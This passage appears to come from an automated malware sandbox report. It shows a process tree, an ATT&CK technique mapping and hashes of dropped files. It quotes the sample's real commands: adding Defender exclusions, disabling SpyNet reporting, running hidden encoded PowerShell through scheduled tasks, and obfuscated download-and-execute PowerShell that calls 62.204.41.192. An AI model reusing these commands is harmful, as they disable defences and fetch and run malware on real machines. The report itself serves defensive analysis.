C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 608
3⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3808 -ip 3808
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3372 -ip 3372
1⤵
PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5212 -ip 5212
1⤵
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 460
1⤵
- Program crash
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5212 -ip 5212
1⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\7zS385E.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5872

C:\Users\Admin\AppData\Local\Temp\7zS482D.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5360

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:5316

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:3924

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:5172

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:3548

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:5780

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:1704

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:2060

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:4388

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNolbFUQj" /SC once /ST 02:39:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:5144

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNolbFUQj"
3⤵
PID:3888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNolbFUQj"
3⤵
PID:4552

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 03:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\xARPeUT.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:5976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 300
3⤵
- Executes dropped EXE
- Program crash
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3372 -ip 3372
1⤵
PID:6048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2452 -ip 2452
1⤵
PID:2008

C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
1⤵
- Executes dropped EXE
PID:4704

C:\Windows\SysWOW64\cmd.exe
cmd
1⤵
PID:4708

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
2⤵
- Enumerates processes with tasklist
PID:4760

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
2⤵
PID:2552

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
2⤵
- Enumerates processes with tasklist
PID:4956

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
2⤵
PID:5508

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
2⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3008

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
2⤵
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1572 -ip 1572
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3076 -ip 3076
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 480
1⤵
- Program crash
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
1⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 468
1⤵
- Program crash
PID:536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:5916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:5948

C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
1⤵
- Executes dropped EXE
PID:5772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:5300

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3076 -ip 3076
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1572 -ip 1572
1⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 460
1⤵
- Program crash
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3372 -ip 3372
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2452 -ip 2452
1⤵
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3372 -ip 3372
1⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3372 -ip 3372
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3372 -ip 3372
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3372 -ip 3372
1⤵
PID:5320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5280

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5532 -ip 5532
1⤵
PID:5444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:456

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
3e4a270a8c1278f05a1c017e430bbdb6

SHA1
e7ecffc217dc4c763b932f716af2442f667dfec8

SHA256
0b62913674a2e3f1bc8ebdc3cd05a3127b4775c135f1a05146a8db699acf8f67

SHA512
1d7e252d2577da6dab31ebc30abc1cdd2bf24d95a734b323f1d18dc4c8dd891641d8372d2718914dc6d02c47760019fad8fdc9529674d58e7f388d9ee4094038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
3b3ae2b28ae533bf89071e80738c60b3

SHA1
339000c34cbaeced8672524882a69c2e7d87a95d

SHA256
d8723fc8a20413de9be784f0903c3a1e663b482b6a192238aebc3c3fd096813a

SHA512
5eee26d2d12e9169816d9a14e00972f93e1c6272e6c3a427667a92ffe7bfb403bbbb2269aedba57969473b98bc807f2e5c7f52635d8ce54d03c62aa2bec7a6a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CC4F.tmp
MD5
4f3387277ccbd6d1f21ac5c07fe4ca68

SHA1
e16506f662dc92023bf82def1d621497c8ab5890

SHA256
767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac

SHA512
9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
9c2380e35c091bc8677ecd5e698fafa0

SHA1
e43ff94496efae100a9b2ccc773735ecc87520f2

SHA256
618609470dffb373c1c22b9bb2d0ed8348184f619978080a9aaad42d879b562e

SHA512
155239fce5d4bab83ffa099a286d99ce9d06f6a4869db1794ed779026017e01a7a4bc9724cf29fcee07a693fd31c59e6a01dbb32e10f4f6fa842e7336603e485

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
9c2380e35c091bc8677ecd5e698fafa0

SHA1
e43ff94496efae100a9b2ccc773735ecc87520f2

SHA256
618609470dffb373c1c22b9bb2d0ed8348184f619978080a9aaad42d879b562e

SHA512
155239fce5d4bab83ffa099a286d99ce9d06f6a4869db1794ed779026017e01a7a4bc9724cf29fcee07a693fd31c59e6a01dbb32e10f4f6fa842e7336603e485

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
d13874c290cc8dd172d9f253f41ddc3d

SHA1
4a24edbadc893cde600ae7fc341b3ae290d01cae

SHA256
dc6ea8c6ebcd84e935cbd5eae0717f7a52fc513761e7a031a7650c9bfdfaf12c

SHA512
e5e20cb7bacc8122062bfbf67592560369a365112d7fc3526ad98bdc8e6f941bf05625897741bf18544441104cb5600a84fee01fe5f2bf666b056b141aa7fbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
d13874c290cc8dd172d9f253f41ddc3d

SHA1
4a24edbadc893cde600ae7fc341b3ae290d01cae

SHA256
dc6ea8c6ebcd84e935cbd5eae0717f7a52fc513761e7a031a7650c9bfdfaf12c

SHA512
e5e20cb7bacc8122062bfbf67592560369a365112d7fc3526ad98bdc8e6f941bf05625897741bf18544441104cb5600a84fee01fe5f2bf666b056b141aa7fbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
6db938b22272369c0c2f1589fae2218f

SHA1
8279d75d704aaf9346e8f86df5aa1f2e8a734bb9

SHA256
a3f4061d3d60ae5a3ee4a168f1bec3790e1927f77184915a821d1eade478677e

SHA512
a83cae75c7d9f98e4841f1517ec6ea867731f3f3c52a2f12c372be01c7da0a53d458eadfc61309a906ed63c48ca80194ddf52a084044a20e8a2bd3679e492c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
6db938b22272369c0c2f1589fae2218f

SHA1
8279d75d704aaf9346e8f86df5aa1f2e8a734bb9

SHA256
a3f4061d3d60ae5a3ee4a168f1bec3790e1927f77184915a821d1eade478677e

SHA512
a83cae75c7d9f98e4841f1517ec6ea867731f3f3c52a2f12c372be01c7da0a53d458eadfc61309a906ed63c48ca80194ddf52a084044a20e8a2bd3679e492c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
dc0eb1954fcd8209f2f1e43f76076d0e

SHA1
f29138cee59ccf6fb7b8856e56650fd617052d37

SHA256
12f5abe8c4e4436e2839897dedb5ffdfa6fa5da21d17a990d4a39d78bf9dd424

SHA512
3aeabe655abc6ea93a21778648b7c8b0fd74b0b86e4c52a62384af9d13197924d83c918dd5da70b4d6a4c01f85d0377f36af504e981193a9cb0553c48dac6f4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
dc0eb1954fcd8209f2f1e43f76076d0e

SHA1
f29138cee59ccf6fb7b8856e56650fd617052d37

SHA256
12f5abe8c4e4436e2839897dedb5ffdfa6fa5da21d17a990d4a39d78bf9dd424

SHA512
3aeabe655abc6ea93a21778648b7c8b0fd74b0b86e4c52a62384af9d13197924d83c918dd5da70b4d6a4c01f85d0377f36af504e981193a9cb0553c48dac6f4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
MD5
954264f2ba5b24bbeecb293be714832c

SHA1
fde3ad6e6d8ab951b002c7ca17e867bf3c1d9ba0

SHA256
db5906a6a58c5f7e8991fb5c3a7201843142844650eb5b89bdf89094aba9e96c

SHA512
8fb15e5888d713e10df04b64c0a24250547a978eac9a7b25d653c343f01afc204fa661937a76644a2dcd3f5b65225450d3aaecb67014125a50722df21467ee53

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
MD5
954264f2ba5b24bbeecb293be714832c

SHA1
fde3ad6e6d8ab951b002c7ca17e867bf3c1d9ba0

SHA256
db5906a6a58c5f7e8991fb5c3a7201843142844650eb5b89bdf89094aba9e96c

SHA512
8fb15e5888d713e10df04b64c0a24250547a978eac9a7b25d653c343f01afc204fa661937a76644a2dcd3f5b65225450d3aaecb67014125a50722df21467ee53

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5
5fd2eba6df44d23c9e662763009d7f84

SHA1
43530574f8ac455ae263c70cc99550bc60bfa4f1

SHA256
2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

SHA512
321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
ee24d003810e8e9b55968e1d3518be34

SHA1
6c3a6b34f08225ce798972b93e06d935de061567

SHA256
607db268fc9eac06db29f5e6b16f021f1af6f00ab5554b4e4501846e51dbc11f

SHA512
7470470ba466541a8dde8f405e6ac972384d56f0628bbc5e1e037fb7a22066f9c8d0f7c152a36864b9791a462251784e7b08d278a017b990f48da82b82168283

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
MD5
99593e4ab300b7bdb824be41cf4ee970

SHA1
c8f21d6dab55cb0dcf97f1863c7e107594c9f06a

SHA256
a832e13a0672daf30ae1f5e8df6bae3632521c57df5abf96873a8cda5aebc5c2

SHA512
1f6f89094dfc4328dfbb5b1fa943c0608076fcd459ebb10e1010a7b24f10be546c68abdb790b282d3b3bfd5c00eb4d49de55c95a73dc7406ed112285e45521d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
MD5
99593e4ab300b7bdb824be41cf4ee970

SHA1
c8f21d6dab55cb0dcf97f1863c7e107594c9f06a

SHA256
a832e13a0672daf30ae1f5e8df6bae3632521c57df5abf96873a8cda5aebc5c2

SHA512
1f6f89094dfc4328dfbb5b1fa943c0608076fcd459ebb10e1010a7b24f10be546c68abdb790b282d3b3bfd5c00eb4d49de55c95a73dc7406ed112285e45521d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
8d0f4a38657a5aa84e399d099fda310d

SHA1
0f62e232d908f39718614e2cc84f20d45df9b68a

SHA256
5176004408fe2b72587696c981d3d01989a7aded7048a5ba901349d6cfcc82b2

SHA512
8b81b29d605f5a51f01a0fc2e5846b26a6c077e852876a3486b1803a4c8940f143284b67fc619c67139502557f3038f5607e72d9871afd437ea0e2064b05bb38

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
8d0f4a38657a5aa84e399d099fda310d

SHA1
0f62e232d908f39718614e2cc84f20d45df9b68a

SHA256
5176004408fe2b72587696c981d3d01989a7aded7048a5ba901349d6cfcc82b2

SHA512
8b81b29d605f5a51f01a0fc2e5846b26a6c077e852876a3486b1803a4c8940f143284b67fc619c67139502557f3038f5607e72d9871afd437ea0e2064b05bb38

Download Submit
C:\Users\Admin\AppData\Local\Temp\pzyh.exe
MD5
ecec67e025fcd37f5d6069b5ff5105ed

SHA1
9a5a0bed2212f47071ad27b28fe407746ecfad18

SHA256
51ac8ea2c6cab10489188133a109aa4507b76ea459996173d0679d542780387c

SHA512
a9d59f137e8688bcee3f1fdc327b41b7f8d836c8e4753e1e9887e03a7c97ecfb851e9d88460f1003970fbaf8638eaa7dd94eb5875a30f51b2c2e7a20a1b51e33

Download Submit
C:\Users\Admin\AppData\Local\Temp\pzyh.exe
MD5
ecec67e025fcd37f5d6069b5ff5105ed

SHA1
